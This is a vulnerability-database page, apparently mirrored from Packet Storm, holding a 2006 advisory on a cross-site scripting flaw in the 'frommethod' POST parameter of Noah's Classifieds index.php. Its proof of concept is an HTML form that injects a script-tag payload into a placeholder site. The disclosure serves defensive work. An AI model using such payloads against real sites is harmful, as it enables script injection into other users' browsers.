Lucene search
K

NoahsClassifieds.txt

🗓️ 14 Oct 2006 00:00:00Reported by Raphael HuckType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Noah's Classifieds XSS Vulnerability in "index.php" for

Code
`Noah's Classifieds is prone to a Cross Site Scripting Vulnerability, due to a failure in the application to properly sanitize the "frommethod" POST parameter in "index.php" :  
  
<html>  
<body>  
  
<form method="POST" enctype="multipart/form-data" action="http://www.example.com/classifieds/index.php">  
  
<input type="hidden" name="fromlist" value="advertisement">  
<input type="hidden" name="frommethod" value="'><script>alert('XSS Vulnerable');</script>"  
<input type="submit" value="Cancel" name="submit" class="button">  
  
</form>  
  
</body>  
</html>  
  
Advisory: http://zone14.free.fr/advisories/5/  
  
--Raphael HUCK  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation